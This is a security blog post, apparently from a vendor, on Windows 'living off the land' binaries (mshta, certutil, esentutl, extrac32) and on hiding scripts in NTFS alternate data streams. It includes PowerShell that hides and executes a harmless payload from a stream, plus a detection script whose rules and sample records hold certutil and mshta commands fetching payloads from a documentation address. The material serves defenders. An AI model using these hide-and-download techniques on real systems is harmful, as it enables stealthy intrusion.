This article is part of the series "Living off the Land With Microsoft". Check out the rest:
- The Malware Hiding in Your Windows System32 Folder: Intro to Regsvr32
- The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware
- The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate Data Streams
- The Malware Hiding in Your Windows System32 Folder: More Alternate Data Streams and Rundll32
- The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL Security Defense Tips
We don’t like to think that the core Windows binaries on our servers are disguised malware, but it’s not such a strange idea. OS tools such as regsvr32 and mshta (LoL-ware) are the equivalent, in the physical world, of garden tools and stepladders left near the kitchen window. Sure, these tools are useful for work around the yard, but unfortunately they can also be put to use by the bad guys.
Microsoft stopped developing HTA (HTML Applications) long ago, but they left the underlying executable, mshta.exe, lying around on Windows’ virtual lawn: the Windows\System32 folder.
And hackers have been only too eager to take advantage of it. To make matters worse, on far too many Windows installations the .hta file extension is still associated with mshta, so a phishing victim who receives an .hta attachment will launch the application simply by double-clicking the file.
Of course, you’ll have to do more than just disassociate the .hta extension to stop all attacks. See, for example, the Windows Firewall mitigation in the previous post. For kicks, I tried directly executing an .hta file by passing its path to mshta on the command line, and you can see the results below:
It worked fine.
But hackers are far too smart to reveal what they’re doing through obvious file transfer commands! The whole point of living off the land with existing Windows binaries is to hide malicious activity inside what looks like normal system use.
Certutil and Curl-free Remote Downloading
This leads to certutil, yet another Windows binary that serves dual purposes. Its documented job is to dump, display, and configure certification authority (CA) information and to manage certificates on the local machine. You can read more about it here.
In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsvr32, found a dual use for certutil. Smith noticed that certutil’s -urlcache option can be pointed at an arbitrary URL and told to write the response to a file on disk.
This is not completely surprising, since certutil already talks to remote servers to fetch certificates and revocation lists by URL, but it clearly does no checking of what it fetches, effectively turning certutil into a LoL-ware version of curl.
As it turns out, hackers were way ahead of the researchers. It was reported that Brazilian criminal groups had been using certutil this way for some time.
So if attackers obtain shell access through, say, a SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack, without dropping a recognizable hacking tool that antivirus would flag. The download still shows up as a certutil process with a URL on its command line, however, which is exactly the kind of thing a defender should be hunting for.
Hiding Executables With Alternate Data Streams (ADS)
Can the attackers get even stealthier? Unfortunately, yes!
The amazingly clever Oddvar Moe has a great post on Alternate Data Streams and how they can be used to hide malware scripts and executables inside an innocent-looking file.
ADS was Microsoft’s answer to compatibility with the Apple Macintosh file system (HFS). In the Mac world, files carry a lot of metadata (the resource fork) in addition to their regular data. To make it possible to store that metadata on Windows file servers, Microsoft built alternate data streams into NTFS. They exist only on NTFS volumes: copy a file to a FAT32 or exFAT drive and the extra streams are silently dropped.
For example, I can do something like this:
On first review, it might look like I’m directing the text of my .hta file into “stuff.txt”.
Take a closer look at the above screenshot and notice the “:evil.ps1” tacked onto the file name. Then shift your focus to the size of “stuff.txt”: it remains at 0 bytes!
What happened to the text I directed into the file? It’s stored in an alternate data stream named evil.ps1 attached to stuff.txt; Explorer and a plain dir only report the size of the primary (unnamed) stream, and you need dir /r to see the named one. It turns out that I can run scripts and binaries that are secretly held in an alternate data stream, for example by pointing a script host at file:stream.
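The following PowerShell is an added example, not code from the original post or from Varonis. It reproduces the stuff.txt:evil.ps1 trick with the -Stream parameters instead of cmd.exe redirection, shows why the file still reports 0 bytes, and then walks a directory tree hunting for named streams. It needs Windows PowerShell 3.0 or later and an NTFS volume; the directory and file names and the one-line payload are constructed for the demo.

```powershell
# Added example (not from the original post). Requires Windows PowerShell 3.0+
# for the -Stream parameters and an NTFS volume (FAT/exFAT have no streams).
$demoDir = Join-Path $env:TEMP 'ads-demo'            # demo location, constructed
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
$carrier = Join-Path $demoDir 'stuff.txt'            # the innocent-looking file
New-Item -ItemType File -Path $carrier -Force | Out-Null

# Write the payload into a named stream, not into the file's primary stream.
# cmd.exe equivalent:  type evil.ps1 > stuff.txt:evil.ps1
$payload = 'Write-Output "running from an alternate data stream"'   # constructed
Set-Content -Path $carrier -Stream 'evil.ps1' -Value $payload

# Explorer, a plain dir, and .Length only count the primary (unnamed) stream,
# so the carrier still looks empty even though the payload is on disk.
"Primary stream size: {0} bytes" -f (Get-Item -Path $carrier).Length

# List every stream. The unnamed stream shows up as ':$DATA'.
# cmd.exe equivalent:  dir /r stuff.txt
Get-Item -Path $carrier -Stream * | Format-Table Stream, Length -AutoSize

# What the attacker does next: read the hidden script back and execute it.
# cmd.exe equivalent:  powershell -c "Get-Content stuff.txt -Stream evil.ps1 | iex"
Get-Content -Path $carrier -Stream 'evil.ps1' -Raw | Invoke-Expression

# Defender side: list every stream under a path that is neither the primary
# stream nor the browser's Mark-of-the-Web stream (Zone.Identifier), which
# would otherwise drown the results in noise.
function Find-AlternateStreams {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' } |
        Select-Object FileName, Stream, Length
}

Find-AlternateStreams -Path $demoDir

# Clean up. Removing the stream leaves the carrier file itself in place.
Remove-Item -Path $carrier -Stream 'evil.ps1'
Remove-Item -Path $demoDir -Recurse -Force
```

Two caveats for anyone turning Find-AlternateStreams into a hunt: Zone.Identifier is excluded here only to keep the output readable, and a stream with that name can carry anything, so a suspicious host deserves a pass without the filter; and the walk is slow on large trees, so Sysmon Event ID 15 (FileCreateStreamHash), which logs named-stream creation as it happens, is the better source for continuous monitoring.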
And One More Thing
We’ll take a deeper dive into ADS next time. The larger point is the high level of stealth one can achieve with the LoL approach to hacking. There are other binaries that serve dual masters, and you can find a complete list of them on GitHub (the LOLBAS project).
For example, there is a class of Windows binaries (esentutl, extrac32, and others) that can act as file copy tools. In other words, attackers don’t have to reveal themselves by using the obvious Windows copy command.
So security detection that relies on scanning the Windows event log for the usual file commands (copy, xcopy, and the like) will miss sneaky LoL-based file activity.
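The certutil download described earlier and the esentutl/extrac32 copies just mentioned do leave one common trace: an unusual command line on a System32 binary. The PowerShell below is an added example, not from the original post or from Varonis, of hunting for those command lines. The process records are constructed for the demo in the shape of Sysmon Event ID 1 / Security 4688 fields (Image, CommandLine); the rule names, the regular expressions, and the 203.0.113.10 address are mine.

```powershell
# Added example (not from the original post): flag LoL-style command lines in
# process-creation records. -match is case-insensitive by default in PowerShell.
$rules = @(
    @{ Name = 'certutil-download';  Pattern = '\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b' }
    @{ Name = 'certutil-decode';    Pattern = '\bcertutil(\.exe)?\b.*-(de|en)code\b' }
    @{ Name = 'esentutl-copy';      Pattern = '\besentutl(\.exe)?\b.*\s/y\s.*\s/d\s' }
    @{ Name = 'extrac32-copy';      Pattern = '\bextrac32(\.exe)?\b.*\s/c\s' }
    @{ Name = 'regsvr32-scriptlet'; Pattern = '\bregsvr32(\.exe)?\b.*/i:\S*.*scrobj\.dll' }
    @{ Name = 'mshta-remote';       Pattern = '\bmshta(\.exe)?\b.*(https?://|\.hta\b|vbscript:|javascript:)' }
    @{ Name = 'rundll32-script';    Pattern = '\brundll32(\.exe)?\b.*(javascript:|vbscript:)' }
    # file.ext:stream.ps1 etc. on a command line: something is being run from an ADS
    @{ Name = 'ads-execution';      Pattern = '\S+\.\w+:\w[\w.\-]*(\.ps1|\.exe|\.dll|\.js|\.vbs)\b' }
)

# Returns the names of every rule that matches one command line (possibly none).
function Test-LolCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($r in $rules) {
        if ($CommandLine -match $r.Pattern) { $r.Name }
    }
}

# Emits one object per record that tripped at least one rule.
function Find-LolEvents {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $hits = @(Test-LolCommandLine -CommandLine $e.CommandLine)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Image = $e.Image; Rules = ($hits -join ','); CommandLine = $e.CommandLine }
        }
    }
}

# Constructed sample records. 203.0.113.10 is a documentation-only address.
$events = @(
    @{ Image = 'C:\Windows\System32\certutil.exe'; CommandLine = 'certutil.exe -urlcache -split -f http://203.0.113.10/stage.ps1 C:\Users\Public\stage.ps1' }
    @{ Image = 'C:\Windows\System32\certutil.exe'; CommandLine = 'certutil -hashfile C:\Users\bob\setup.msi SHA256' }
    @{ Image = 'C:\Windows\System32\esentutl.exe'; CommandLine = 'esentutl.exe /y C:\Users\Public\stage.ps1 /d C:\ProgramData\svc.ps1 /o' }
    @{ Image = 'C:\Windows\System32\extrac32.exe'; CommandLine = 'extrac32 /Y /C \\203.0.113.10\share\tool.exe C:\ProgramData\tool.exe' }
    @{ Image = 'C:\Windows\System32\mshta.exe';    CommandLine = 'mshta.exe http://203.0.113.10/run.hta' }
    @{ Image = 'C:\Windows\System32\wscript.exe';  CommandLine = 'wscript.exe C:\Users\Public\stuff.txt:evil.js' }
    @{ Image = 'C:\Windows\System32\cmd.exe';      CommandLine = 'cmd.exe /c copy C:\a.txt C:\b.txt' }
)

# The benign hashfile call and the plain copy produce no rows; the other five do.
Find-LolEvents -Events $events | Format-Table -AutoSize -Wrap
```

To run this against a live host, replace $events with Get-WinEvent output. Note that Security event 4688 only carries the command line when "Include command line in process creation events" is enabled through Group Policy; Sysmon Event ID 1 records it unconditionally. The patterns are deliberately narrow so that everyday uses such as certutil -hashfile do not alert, and they will miss obfuscated variants, which is why command-line rules belong alongside, not instead of, monitoring of the file activity itself.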
The lesson is that you need, ahem, a security platform that can analyze the raw file system activity to determine what’s really going on. And then notify your security team when it detects unusual access to the underlying files and directories.
Does the LoL-ware approach to hacking scare you, just a little? Our Varonis Data Security Platform can spot what the hackers don’t want you to see. Learn more!